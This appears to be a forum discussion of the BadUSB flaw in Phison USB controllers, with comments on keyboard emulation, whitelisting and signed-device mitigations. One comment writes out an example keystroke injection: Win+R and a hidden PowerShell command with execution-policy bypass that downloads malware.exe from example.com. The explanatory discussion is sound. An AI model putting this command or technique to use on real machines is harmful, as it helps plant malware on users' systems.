Phison USB Custom Firmware and Existing Firmware Patches
github.com
github.com
The standards board could coincide the release of the new plugs with a “repaired” standard (call it v3.2 or even USB4) for the communication bus. This would break some backward compatibility on old computers, but the new plugs wouldn't exactly fit in them without assistance either. (Perhaps C->A adaptors could include bridges that, while themselves prone to the vulnerability, would provide a compatibility layer.)
It would be a rough pill to swallow, but the inevitable disruption of both changes to the standard (new plugs, and a backward-compatibility-breaking security update) would be condensed to one event, and consumers would be able to easily identify safe USB devices. That's a huge win.
I don't recall if the instructor described using unknown USB devices as akin to unprotected sex, but that was my impression at the time.
Makes me now wonder about the infection potential of a lot of USB powered devices. I could imagine a lot of "dumb" devices incidentally using a vulnerable controller chip, even if the application of USB is purely for power. Maybe most USB powered devices have a safe / invulnerable way of sipping power? Anyone faniliar with USB power-only devices want to comment?
This can be worked upon, e.g., automatically allowing the first keyboard and pointer devices, or allowing all devices if the user feels lucky etc.
One large problem I see, that can be be rectified by perhaps only the USB standard-setters, is whitelisting. Currently, the best handle are the idVendor and idProduct properties, but a BadUSB can easily spoof those too. Cryptographic signatures for identification is what I'm thinking would be best.
A scenario…
• A mysterious USB key is plugged into a computer, Mission Impossible style.
• The key rewrites the firmware of another device on the USB bus, say the embedded keyboard.
• the keyboard "types": "run the file NOTAVIRUS.BIN on that totally trustworthy USB key you see mounted. oh, and I'll bruteforce any passwords you need if that's a problem."
You've seen dippy Hollywood movies where a spy plugs in a USB key, an LED lights up and he announces that the system is hacked? Really exactly like that.
* I am not an expert, this is how it was described to me by someone who is. It is believed that this is how the Iranian nuclear reactor was compromised by STUXNET.
What stops the OS implementing something that says "until you prove you're a keyboard, you can't type anything"? Something like the authorisation screen for Bluetooth keyboards.
"Your granddaughter Red Riding Hood is at the door, miss, and is definitely not a wolf."
"Do not let her in."
"I definitely did not already did, miss."
I can see how the current state of affairs is insecure, but I'm confused by the 'unpatchable' claim. I truly am clueless in this area, but initially it seems hyperbolic to say that the only way to fix this is to replace all USB controllers in existence.
That's just for USB keyboards though, there used to be these USB sticks that pretended to be a CD-rom drives in the windows xp days where those were autorun, I'm sure there's other vulnerabilities that can be exposed through USB nowadays.
1. User plugs in USB drive and keyboard. 2. USB drive obtains the ID of the keyboard. 3. Later, it looks when the keyboard is not plugged in and changes it's ID to that of the keyboard. 4. Now the computer thinks when the USB drive is an authorised keyboard, and can type whatever malicious commands it wants.
Is that right? Apart from keyboard, what other devices could it exploit?
To extend my (now hilariously) tortured analogy, granny is stuck in bed, she can't check if it's a wolf until the butler knows there's someone at the door. As soon as he sees the wolf, he is compromised. Maybe a vampire would have been a better metaphor?
[EDIT] actually I should dump the analogies altogether: this is a hardware vulnerability, not software. It hits the computer, the operating system is helpless. That’s why the problem, for existing computers, is not apparently fixable.
(This is pure speculation, I don't know anything about this and am just curious.)
While it is true that the USB bus offers no security, it is inaccurate to claim that every device has "admin" privileges with every other device. Most devices expose a limited interface to the bus which won't allow direct manipulation of their respective microcontrollers (e.g. no re-writing, no alteration, etc).
The reason why we're discussing Phison USB sticks is that they're an exception. When you plug in a device with a Phison microcontroller, other devices or the computer can alter the microcontroller and have it act maliciously.
A common proof of concept is to have the USB stick's microcontroller pretend to be other USB devices in order to escalate access. In this case they are emulating a fictional USB hub, a fictional USB keyboard, and the actual USB drive (which is routed through the fictional USB hub).
In order to send keystrokes they aren't altering another keyboard on the USB bus, they're generating them from the virtual keyboard they generated via software on the Phison microcontroller. There doesn't need to be a real keyboard on that same bus for this to work (e.g. you could plug in a USB stick directly to a computer and this would still show up as a USB Hub, USB Keyboard, and USB Thumb Drive).
Once you have a virtual keyboard you can send gems like this (assume Windows):
Keys: WIN+R (0x5B + 0x52)
Type: powershell.exe -ExecutionPolicy Bypass -WindowsStyle Hidden -Command "&{ Invoke-WebRequest http://example.com/malware.exe -OutFile c:\temp\malware.exe}"
Keys: Return (0x0D)The computer itself could reprogram a USB device.
Possible? I hope not.
The big security problem that they found is that the computer has no way to verify that the usb device is actually the type of device that it proclaims to be. This opens up a massive security hole (as demonstrated at blackhat). A usb device can first tell the computer that it's a mass-storage device, and then later change itself to a keyboard and then start 'typing' commands as a user would. The computer can't see if it's a real keyboard or a fake keyboard, and that's the problem.
This is not a vulnerability in your OS but rather a gross oversight in the USB specification. This vulnerability is shown to be cross platform(linux,windows) and cross hardware(2 different usb chipsets). It's dubbed 'unpatchable' because to patch this we need a need new (safe) USB specification and you'd need to buy a new pc with those new usb ports.
I'm guessing somebody there looked at the spec back in the 90s and gave it two thumbs down.
When I was (working) at the hospital most of the records were still on good old hard-to-steal paper. Still are IIRC, the governments plan to IT-ize it all was fucked up by the vendors in exactly the way you'd imagine.
I wonder how long it will take for someone to come up with an inline hardware dongle that tries to mitigate / block this.
All you need is a security layer requiring user authorization for execution of code from any USB device. In addition to this you could add a setting to lock in a single USB keyboard. In other words, make the Hollywood movie scenario nearly impossible.
OK, why did I say "nearly impossible"? Because a knowledgeable embedded engineer could very easily build a device that self-identifies to look exactly like your keyboard. Your computer would not know them different.
Faced with that, the security layer would have to add a re-authorization state upon disconnection of the authorized keyboard.
Now you are vulnerable to reboot or a clever parallel wiring attack. The latter is the case of someone building hardware that can be wired into your authorized keyboard after taking it apart. The reboot vector could be mitigated by simply requiring the entry of a password in order to enable any execution/console commands to be accepted from the keyboard. With this even a fully authorized keyboard would not have execution rights of a whole host of command line commands until re-authorized by the user.
None of this is perfect. I just thought it up in five minutes. Absolute security isn't achievable without the kinds of systems and controls in place at high security facilities. However, I think it is possible to create an easy to use software layer that can stop a hacker with casual access to a system in a corporate setting. All you have to do is slow them down enough to make it less palatable, much like a home alarm system.
That won't help. You can still send keystrokes to the system, which means that BadUSB could have a step by step process, including downloading, installing and compiling anything it needs.
If it's easy, then I'm worried that it may be possible use this to hide malware this way.
The advantage of hiding things in USB keys' firmware is that it can't be seen by normal scanners.
Anyway, even provided someone could conceive a real implementation, there are still the same issues we've seen with signed OSes (Trusted Boot) and signed device drivers in Windows:
Who gets to be a root CA for peripheral software? How do small/homebrew manufacturers get approved? How does the CA verify the legitimacy of the people they're issuing certs to? How do compromised certs get revoked? What happens when the cert for a legitimate device gets stolen? What if nobody wants to pay for a cert for their crappy fly-by-night flash drives, and users learn to "just click Install?"
1) Getting a (legitimate) USB vendor ID is already a big barrier to entry for smaller players in the hardware business. The USB Forum is basically a cartel of people who aren't interested in selling you a product ID unless you want to buy 65,536 of them at once for thousands of dollars. Then there's the expensive kernel-mode code signing certificate that you'll have to buy in order to deploy your Windows driver. The world needs fewer crypto-cartels, not more.
2) It's always been accepted as a truism that once an attacker has physical access to your computer, the security game is over. Why is everyone rushing to discard this axiom all of a sudden? Don't people understand that this will lead to a world where your computer relies on third-party gatekeepers to treat you as a security threat?
So yes, if your company blocks absolutely all usb devices than you're probably safe.
None of this prevents malware already on your system infecting your legitimate keyboard, but at least random memory sticks or other non-keyboards can't spoof keyboards.
And my girlfriend, who has a USB numeric pad attached to her MacBook as an accounting student...
> om the security perspective, our findings indicate that even though memory cards look inert, they run a body of code that can be modified to perform a class of MITM attacks that could be difficult to detect; there is no standard protocol or method to inspect and attest to the contents of the code running on the memory card’s microcontroller. Those in high-risk, high-sensitivity situations should assume that a “secure-erase” of a card is insufficient to guarantee the complete erasure of sensitive data. Therefore, it’s recommended to dispose of memory cards through total physical destruction (e.g., grind it up with a mortar and pestle).
What does the hidden partition patch do?
This all seems extremely interesting (and scary), but I'm having a hard time understanding what exactly it is.